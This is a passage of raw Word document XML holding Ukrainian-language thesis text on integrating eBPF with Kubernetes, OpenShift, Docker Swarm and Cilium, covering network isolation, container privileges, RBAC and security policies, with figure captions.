          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Kubernetes використовує власну систему мережевих плагінів (CNI), яка створює ізольовані мережі для контейнерів. Це забезпечує безпеку та контроль над мережевими потоками в межах кожного контейнера, але водночас може обмежити можливості eBPF для моніторингу мережевого трафіку між контейнерами або між контейнерами і хостом. Оскільки eBPF працює на рівні ядра і потребує доступу до мережевих потоків для виконання своїх функцій, ця ізоляція ускладнює його інтеграцію в середовище Kubernetes. Для того щоб eBPF міг ефективно взаємодіяти з мережевими потоками на рівні кластера, необхідно налаштувати спеціальні мережеві плагіни або використовувати </w:t>
      </w:r>
      <w:r w:rsidRPr="0015581F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>додаткові інструменти, які дозволяють інтегрувати eBPF в існуючі мережеві стеки Kubernetes. Це може включати такі рішення, як Cilium, яке активно використовує eBPF для забезпечення безпеки та моніторингу трафіку між контейнерами, або інші спеціалізовані плагіни, що дозволяють розширити функціональність мережевої ізоляції для eBPF.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015581F" w:rsidRDefault="0015581F" w:rsidP="00AA5B2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По друге, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Kubernetes забезпечує запуск контейнерів з мінімальними привілеями, що може ускладнити виконання eBPF-програм, які потребують доступу до низькорівневих системних функцій. Зазвичай для використання таких функцій необхідно надати контейнерам підвищені привілеї або використовувати механізми безпеки для чіткої фільтрації доступу. Проте, надання високих привілеїв для контейнерів може порушити принципи безпеки в Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00195BFD" w:rsidRDefault="0015581F" w:rsidP="00AA5B2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І наостанок,</w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes має розвинену систему безпеки, яка включає рольову базовану модель доступу (RBAC)</w:t>
      </w:r>
      <w:r w:rsidR="00195BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="007538B2" w:rsidRPr="007538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>2.1</w:t>
      </w:r>
      <w:r w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, політики безпеки контейнерів (PodSecurit</w:t>
      </w:r>
      <w:r w:rsidR="00195BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>yPolicies)</w:t>
      </w:r>
      <w:r w:rsidR="00195BFD" w:rsidRPr="00195BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00195BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>– Рисунок</w:t>
      </w:r>
      <w:r w:rsidR="007538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.2</w:t>
      </w:r>
      <w:r w:rsidR="007538B2" w:rsidRPr="007538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00195BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>та інші інструменти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00195BFD" w:rsidRDefault="00195BFD" w:rsidP="00195BFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3501049" cy="1562100"/>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327" t="4833" r="3365" b="17523"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3505542" cy="1564105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00195BFD" w:rsidRDefault="007538B2" w:rsidP="00195BFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>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Рисунок </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1. – </w:t>
      </w:r>
      <w:r w:rsidR="00195BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Модель доступу RBAC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00195BFD" w:rsidRDefault="00195BFD" w:rsidP="00AA5B2B">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195BFD" w:rsidRDefault="00195BFD" w:rsidP="00195BFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2152650" cy="202480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5688" cy="2037068"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00195BFD" w:rsidRDefault="007538B2" w:rsidP="00195BFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>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Рисунок</w:t>
      </w:r>
      <w:r w:rsidRPr="007538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.2</w:t>
      </w:r>
      <w:r w:rsidR="00195BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00195BFD">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eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidR="00195BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">олітики безпеки контейнерів </w:t>
      </w:r>
      <w:r w:rsidR="00195BFD" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>PS</w:t>
      </w:r>
      <w:r w:rsidR="00195BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B2B" w:rsidRPr="00AA5B2B" w:rsidRDefault="00AA5B2B" w:rsidP="00AA5B2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AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Для інтеграції eBPF потрібно враховувати ці механізми безпеки, щоб гарантувати, що доступ до ядра хоста та виконання eBPF-програм здійснюються відповідно до політик безпеки. Наприклад, можна використовувати Seccomp або AppArmor для обмеження доступу до системних викликів, що знижує ризики для безпеки</w:t>
      </w:r>
      <w:r w:rsidR="0095301E" w:rsidRPr="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [17]</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005366E0" w:rsidRPr="00AA5B2B" w:rsidRDefault="0095301E" w:rsidP="005366E0">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95301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="005366E0" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Окрім Docker і Kubernetes, eBPF також активно використовується в багатьох інших платформах і інструментах для управління контейнерами, такими як OpenShift, Docker Swarm</w:t>
      </w:r>
      <w:r w:rsidR="00003BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Рис. </w:t>
      </w:r>
      <w:r w:rsidRPr="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>2.3.</w:t>
      </w:r>
      <w:r w:rsidR="00003BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="005366E0" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, а також в інструментах для моніторингу і безпеки, таких як Cilium або Weave. Кожна з цих платформ має свої специфічні особливості, які можуть впливати на сумісність eBPF</w:t>
      </w:r>
      <w:r w:rsidRPr="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [17]</w:t>
      </w:r>
      <w:r w:rsidR="005366E0" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00003BFC" w:rsidRDefault="00003BFC" w:rsidP="00003BFC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5834825" cy="34861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1218"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5836454" cy="3487123"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00003BFC" w:rsidRDefault="0095301E" w:rsidP="00003BFC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>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Рисунок</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3. – </w:t>
      </w:r>
      <w:r w:rsidR="00003BFC" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Docker Swarm</w:t>
      </w:r>
      <w:r w:rsidR="00003BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> платформа</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00003BFC" w:rsidRDefault="00003BFC" w:rsidP="00003BFC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00155622" w:rsidRDefault="00F35B33" w:rsidP="00155622">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 OpenShift </w:t>
      </w:r>
      <w:r w:rsidR="00155622">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">(Рис. </w:t>
      </w:r>
      <w:r w:rsidR="0095301E" w:rsidRPr="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>2.4.</w:t>
      </w:r>
      <w:r w:rsidR="00155622">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00155622" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>: Як платформа для оркестрації контейнерів на базі Kubernetes, OpenShift також має ряд специфічних вимог до безпеки та доступу до системних ресурсів. Для інтеграції eBPF в OpenShift необхідно враховувати обмеження на рівні доступу до ядра хоста та інші механізми безпеки, які є стандартом для цієї платформи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069465C" w:rsidRDefault="0069465C" w:rsidP="00003BFC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00003BFC" w:rsidRDefault="00003BFC" w:rsidP="00994980">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F1B011A" wp14:editId="5A061577">
            <wp:extent cx="3896783" cy="2311400"/>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487" t="5740" r="11218"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3900205" cy="2313430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069465C" w:rsidRDefault="0095301E" w:rsidP="0069465C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>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Рисунок</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4. – </w:t>
      </w:r>
      <w:r w:rsidR="0069465C" w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>OpenShift</w:t>
      </w:r>
      <w:r w:rsidR="0069465C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> платформа</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00003BFC" w:rsidRDefault="00003BFC" w:rsidP="00AA5B2B">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AA5B2B" w:rsidRDefault="00F35B33" w:rsidP="00AA5B2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Cilium</w:t>
      </w:r>
      <w:r w:rsidR="000E2E96">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Рис. </w:t>
      </w:r>
      <w:r w:rsidR="0095301E" w:rsidRPr="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
